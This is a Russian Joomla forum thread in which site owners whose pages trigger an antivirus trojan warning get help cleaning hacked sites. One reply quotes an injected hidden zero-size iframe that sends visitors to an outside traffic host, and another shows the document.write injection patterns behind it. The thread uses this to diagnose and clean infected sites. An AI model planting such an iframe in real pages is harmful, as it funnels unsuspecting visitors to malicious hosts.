0 Пользователей и 1 Гость просматривают эту тему.
  • 15 Ответов
  • 2252 Просмотров
*

krizis

  • Захожу иногда
  • 64
  • 0 / 0
Здраствуйте, недели две назат столкнулся с такой проблемой сайт стал выдавать вирус "Угроза: JS/Iframe.MA троянская программа" антивирус eset smart "
кто подскажет как исправить проблемку эту, это у меня или на хосте-домене, сайт ссылка вырезана


« Последнее редактирование: 02.10.2015, 21:43:10 от era »
*

wishlight

  • Живу я здесь
  • 4871
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Какая версия Joomla и что установлено? Взломали походу.
*

krizis

  • Захожу иногда
  • 64
  • 0 / 0
Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?
*

draff

  • Гуру
  • 5184
  • 365 / 7
  • ищу работу
А шаблон включить стандартный пробовал?
*

winstrool

  • Давно я тут
  • 813
  • 51 / 2
  • Свободен для работы
У вас фреймов в топе этих накидано хоть жоп...ой жуй, взломали однозначно! сливают трафик возможно на связку сплоитов.

Цитировать
<iframe width="0" height="0" src="http://c11n4.i.teaserguide.com/snitch?default_keyword=%D0%91%D0%B8%D0%B1%D0%BB%D0%B8%D0%BE%D1%82%D0%B5%D0%BA%D0%B8%20%D0%9D%D0%B5%D1%81%D1%82%D0%B5%D1%80%D0%BE%D0%B2%D1%81%D0%BA%D0%BE%D0%B3%D0%BE%20%D1%80%D0%B0%D0%B9%D0%BE%D0%BD%D0%B0&amp;referrer=&amp;se_referrer=&amp;source=bibliosistema.ru"></iframe>

P.S: Стоит уязвимый компонент com_joomlaupdate, админка не прикрыта бейсик авторизацией
« Последнее редактирование: 01.10.2015, 11:28:18 от winstrool »
*

krizis

  • Захожу иногда
  • 64
  • 0 / 0
а где фрейм прописывается кто подскажет не могу накопать
*

draff

  • Гуру
  • 5184
  • 365 / 7
  • ищу работу
в яваскриптах.
Код
document.write('<iframe
или
Код
document.write("<scr"+"ipt
*

voland

  • Легенда
  • 11009
  • 585 / 112
  • Эта строка съедает место на вашем мониторе
Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?
Зачем так нагло врать?

Тут куча гадости стоит, сами же наставили вирусов, еще и ссылка на эту гадость!
*

krizis

  • Захожу иногда
  • 64
  • 0 / 0
я не вру, я только учусь. Простите если что не так
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?
Так отвечайте на вопросы коректно, ни чего не ставили это означает что взяли пакет движка с Joomla.org и больше ни чего кроме него не ставили максимум языковой пакет, а у вас как у любого новичка/ученика помойка всего и вы считаете что ни чего больше не устанавливали.
В вашем случае или к специалистам обращаться или долго и упорно обучаться.
*

krizis

  • Захожу иногда
  • 64
  • 0 / 0
Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #10 : 03.10.2015, 11:54:55 »
спасибо за комплимент
*

dr.red

  • Захожу иногда
  • 51
  • 0 / 0
Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #11 : 03.10.2015, 15:51:45 »
В тот-же день так-же сломали сайт и теперь выдает туже ошибку. но я не вижу чтобы что-то было подключено. http://exaltacleaning.ru/
*

winstrool

  • Давно я тут
  • 813
  • 51 / 2
  • Свободен для работы
Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #12 : 03.10.2015, 16:55:43 »
В тот-же день так-же сломали сайт и теперь выдает туже ошибку. но я не вижу чтобы что-то было подключено. http://exaltacleaning.ru/
У вас под тегом <BODY> прописан js/frame убрать его можно с шаблона, ну и сразу же ищите шелы!
*

dr.red

  • Захожу иногда
  • 51
  • 0 / 0
Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #13 : 28.11.2016, 03:08:39 »
Для того чтобы не было частых взломов рекомендуется обновлять движок до последней версии. Также при каждой установке нового дополнения проверить нету ли где-то нового JS.
*

dialit

  • Захожу иногда
  • 70
  • 1 / 0
Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #14 : 28.11.2016, 08:53:02 »
Цитата: winstrool
P.S: Стоит уязвимый компонент com_joomlaupdate, админка не прикрыта бейсик авторизацией
скажите, что значит бейсик авторизация?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #15 : 28.11.2016, 12:35:21 »
скажите, что значит бейсик авторизация?
то же самое что и Базовая HTTP-авторизация Basic Authorization
выставить можно из панели хостинга выбрав папку и назначив на неё ограничение с паролем
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Динамический вирус на сайте в JS и в IFRAME

Автор Dusk09

Ответов: 11
Просмотров: 1495
Последний ответ 26.12.2016, 20:38:21
от capricorn
Поиск чужого iframe

Автор portoss77

Ответов: 20
Просмотров: 2278
Последний ответ 23.07.2014, 15:11:19
от draff
IFRAME accounts.google.com вставка кода

Автор artangel

Ответов: 10
Просмотров: 3317
Последний ответ 26.10.2013, 23:38:30
от artangel
Вирус <iframe width="0" height="0" frameborder="0" scrolling="no" src="

Автор New_guy

Ответов: 22
Просмотров: 36469
Последний ответ 13.04.2013, 14:09:17
от Paphnuty
Плохой iframe, как его убрать?

Автор Obsi

Ответов: 8
Просмотров: 1788
Последний ответ 19.02.2013, 18:15:43
от Obsi